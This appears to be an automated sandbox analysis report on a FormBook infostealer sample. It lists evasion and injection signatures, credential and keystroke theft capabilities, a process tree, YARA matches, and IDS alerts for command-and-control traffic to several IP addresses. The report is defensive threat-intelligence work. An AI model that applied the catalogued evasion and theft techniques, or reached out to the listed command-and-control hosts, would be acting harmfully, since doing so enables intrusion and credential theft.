Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.20173.21714.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.20173.21714.exe
Analysis ID:1549831
MD5:0f2ea753c03b03eac2e1c52ef6fce533
SHA1:49c5baa2bd86b8ac7fa0bd040a7efd76456bc8ba
SHA256:1c5d8942e468a007ace85c9e6c063f5931b052eede87f08e4904df083a9d9d15
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.20173.21714.exe (PID: 5448 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe" MD5: 0F2EA753C03B03EAC2E1C52EF6FCE533)
    • svchost.exe (PID: 4140 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HJizhlDIjKVk.exe (PID: 5096 cmdline: "C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • control.exe (PID: 6064 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • HJizhlDIjKVk.exe (PID: 4040 cmdline: "C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6636 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.4590001024.0000000005650000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2512560372.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4584186845.0000000004A60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2516129694.0000000007F50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.4584164680.0000000003FE0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe, ParentProcessId: 5448, ParentProcessName: SecuriteInfo.com.FileRepMalware.20173.21714.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", ProcessId: 4140, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", CommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe, ParentProcessId: 5448, ParentProcessName: SecuriteInfo.com.FileRepMalware.20173.21714.exe, ProcessCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe", ProcessId: 4140, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T05:21:13.406542+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649747TCP
                2024-11-06T05:21:51.288076+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649957TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T05:21:49.647859+010020507451Malware Command and Control Activity Detected192.168.2.6499443.33.130.19080TCP
                2024-11-06T05:22:21.140922+010020507451Malware Command and Control Activity Detected192.168.2.6499893.33.130.19080TCP
                2024-11-06T05:22:35.108053+010020507451Malware Command and Control Activity Detected192.168.2.64999338.88.82.5680TCP
                2024-11-06T05:22:49.500133+010020507451Malware Command and Control Activity Detected192.168.2.6499983.33.130.19080TCP
                2024-11-06T05:23:02.816885+010020507451Malware Command and Control Activity Detected192.168.2.6500023.33.130.19080TCP
                2024-11-06T05:23:16.216401+010020507451Malware Command and Control Activity Detected192.168.2.65000667.223.117.14280TCP
                2024-11-06T05:23:29.790674+010020507451Malware Command and Control Activity Detected192.168.2.650010178.79.184.19680TCP
                2024-11-06T05:23:51.677592+010020507451Malware Command and Control Activity Detected192.168.2.650015185.179.189.19380TCP
                2024-11-06T05:24:05.725076+010020507451Malware Command and Control Activity Detected192.168.2.65001952.20.84.6280TCP
                2024-11-06T05:24:19.039876+010020507451Malware Command and Control Activity Detected192.168.2.6500233.33.130.19080TCP
                2024-11-06T05:24:32.392496+010020507451Malware Command and Control Activity Detected192.168.2.6500273.33.130.19080TCP
                2024-11-06T05:24:46.326045+010020507451Malware Command and Control Activity Detected192.168.2.650031162.241.85.9480TCP
                2024-11-06T05:24:59.706745+010020507451Malware Command and Control Activity Detected192.168.2.6500353.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T05:21:49.647859+010028554651A Network Trojan was detected192.168.2.6499443.33.130.19080TCP
                2024-11-06T05:22:21.140922+010028554651A Network Trojan was detected192.168.2.6499893.33.130.19080TCP
                2024-11-06T05:22:35.108053+010028554651A Network Trojan was detected192.168.2.64999338.88.82.5680TCP
                2024-11-06T05:22:49.500133+010028554651A Network Trojan was detected192.168.2.6499983.33.130.19080TCP
                2024-11-06T05:23:02.816885+010028554651A Network Trojan was detected192.168.2.6500023.33.130.19080TCP
                2024-11-06T05:23:16.216401+010028554651A Network Trojan was detected192.168.2.65000667.223.117.14280TCP
                2024-11-06T05:23:29.790674+010028554651A Network Trojan was detected192.168.2.650010178.79.184.19680TCP
                2024-11-06T05:23:51.677592+010028554651A Network Trojan was detected192.168.2.650015185.179.189.19380TCP
                2024-11-06T05:24:05.725076+010028554651A Network Trojan was detected192.168.2.65001952.20.84.6280TCP
                2024-11-06T05:24:19.039876+010028554651A Network Trojan was detected192.168.2.6500233.33.130.19080TCP
                2024-11-06T05:24:32.392496+010028554651A Network Trojan was detected192.168.2.6500273.33.130.19080TCP
                2024-11-06T05:24:46.326045+010028554651A Network Trojan was detected192.168.2.650031162.241.85.9480TCP
                2024-11-06T05:24:59.706745+010028554651A Network Trojan was detected192.168.2.6500353.33.130.19080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T05:22:13.423230+010028554641A Network Trojan was detected192.168.2.6499853.33.130.19080TCP
                2024-11-06T05:22:16.034847+010028554641A Network Trojan was detected192.168.2.6499873.33.130.19080TCP
                2024-11-06T05:22:18.518579+010028554641A Network Trojan was detected192.168.2.6499883.33.130.19080TCP
                2024-11-06T05:22:27.479694+010028554641A Network Trojan was detected192.168.2.64999038.88.82.5680TCP
                2024-11-06T05:22:30.016357+010028554641A Network Trojan was detected192.168.2.64999138.88.82.5680TCP
                2024-11-06T05:22:32.586085+010028554641A Network Trojan was detected192.168.2.64999238.88.82.5680TCP
                2024-11-06T05:22:40.818273+010028554641A Network Trojan was detected192.168.2.6499943.33.130.19080TCP
                2024-11-06T05:22:43.502678+010028554641A Network Trojan was detected192.168.2.6499953.33.130.19080TCP
                2024-11-06T05:22:46.016907+010028554641A Network Trojan was detected192.168.2.6499963.33.130.19080TCP
                2024-11-06T05:22:55.184715+010028554641A Network Trojan was detected192.168.2.6499993.33.130.19080TCP
                2024-11-06T05:22:57.782676+010028554641A Network Trojan was detected192.168.2.6500003.33.130.19080TCP
                2024-11-06T05:23:00.285861+010028554641A Network Trojan was detected192.168.2.6500013.33.130.19080TCP
                2024-11-06T05:23:08.570890+010028554641A Network Trojan was detected192.168.2.65000367.223.117.14280TCP
                2024-11-06T05:23:11.120389+010028554641A Network Trojan was detected192.168.2.65000467.223.117.14280TCP
                2024-11-06T05:23:13.667887+010028554641A Network Trojan was detected192.168.2.65000567.223.117.14280TCP
                2024-11-06T05:23:22.158199+010028554641A Network Trojan was detected192.168.2.650007178.79.184.19680TCP
                2024-11-06T05:23:24.728373+010028554641A Network Trojan was detected192.168.2.650008178.79.184.19680TCP
                2024-11-06T05:23:27.281422+010028554641A Network Trojan was detected192.168.2.650009178.79.184.19680TCP
                2024-11-06T05:23:44.092129+010028554641A Network Trojan was detected192.168.2.650011185.179.189.19380TCP
                2024-11-06T05:23:46.664593+010028554641A Network Trojan was detected192.168.2.650013185.179.189.19380TCP
                2024-11-06T05:23:49.124451+010028554641A Network Trojan was detected192.168.2.650014185.179.189.19380TCP
                2024-11-06T05:23:58.099794+010028554641A Network Trojan was detected192.168.2.65001652.20.84.6280TCP
                2024-11-06T05:24:00.644844+010028554641A Network Trojan was detected192.168.2.65001752.20.84.6280TCP
                2024-11-06T05:24:03.188852+010028554641A Network Trojan was detected192.168.2.65001852.20.84.6280TCP
                2024-11-06T05:24:11.472867+010028554641A Network Trojan was detected192.168.2.6500203.33.130.19080TCP
                2024-11-06T05:24:13.970701+010028554641A Network Trojan was detected192.168.2.6500213.33.130.19080TCP
                2024-11-06T05:24:16.495564+010028554641A Network Trojan was detected192.168.2.6500223.33.130.19080TCP
                2024-11-06T05:24:25.633559+010028554641A Network Trojan was detected192.168.2.6500243.33.130.19080TCP
                2024-11-06T05:24:27.355632+010028554641A Network Trojan was detected192.168.2.6500253.33.130.19080TCP
                2024-11-06T05:24:29.866494+010028554641A Network Trojan was detected192.168.2.6500263.33.130.19080TCP
                2024-11-06T05:24:38.764285+010028554641A Network Trojan was detected192.168.2.650028162.241.85.9480TCP
                2024-11-06T05:24:41.248340+010028554641A Network Trojan was detected192.168.2.650029162.241.85.9480TCP
                2024-11-06T05:24:43.854465+010028554641A Network Trojan was detected192.168.2.650030162.241.85.9480TCP
                2024-11-06T05:24:52.100209+010028554641A Network Trojan was detected192.168.2.6500323.33.130.19080TCP
                2024-11-06T05:24:54.582791+010028554641A Network Trojan was detected192.168.2.6500333.33.130.19080TCP
                2024-11-06T05:24:58.056725+010028554641A Network Trojan was detected192.168.2.6500343.33.130.19080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeReversingLabs: Detection: 42%
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeVirustotal: Detection: 43%Perma Link
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4590001024.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2512560372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4584186845.0000000004A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2516129694.0000000007F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584164680.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2513521514.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4579324178.0000000000B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4582371287.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeJoe Sandbox ML: detected
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HJizhlDIjKVk.exe, 00000006.00000002.4580974081.0000000000EBE000.00000002.00000001.01000000.00000005.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4580029284.0000000000EBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127383592.0000000004280000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127510930.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413433796.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2411866583.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.0000000003800000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2514339637.0000000004C1A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2512542045.0000000004A64000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: control.pdb source: svchost.exe, 00000002.00000003.2480967498.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479992391.000000000321A000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581155174.0000000001038000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127383592.0000000004280000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127510930.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2413433796.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2411866583.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.0000000003800000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000007.00000003.2514339637.0000000004C1A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2512542045.0000000004A64000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.2480967498.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479992391.000000000321A000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581155174.0000000001038000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: control.exe, 00000007.00000002.4589404879.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4579928297.0000000002F89000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4584541211.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2793957275.000000000B16C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: control.exe, 00000007.00000002.4589404879.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4579928297.0000000002F89000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4584541211.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2793957275.000000000B16C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B6C510 FindFirstFileW,FindNextFileW,FindClose,7_2_00B6C510
                Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then xor eax, eax7_2_00B59EA0
                Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi7_2_00B5E159
                Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then mov ebx, 00000004h7_2_04B604E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49989 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49989 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50006 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50004 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50027 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50027 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50006 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49944 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49944 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50021 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 162.241.85.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49998 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49998 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 185.179.189.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50015 -> 185.179.189.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50015 -> 185.179.189.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50035 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50035 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50002 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50010 -> 178.79.184.196:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 185.179.189.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50002 -> 3.33.130.190:80
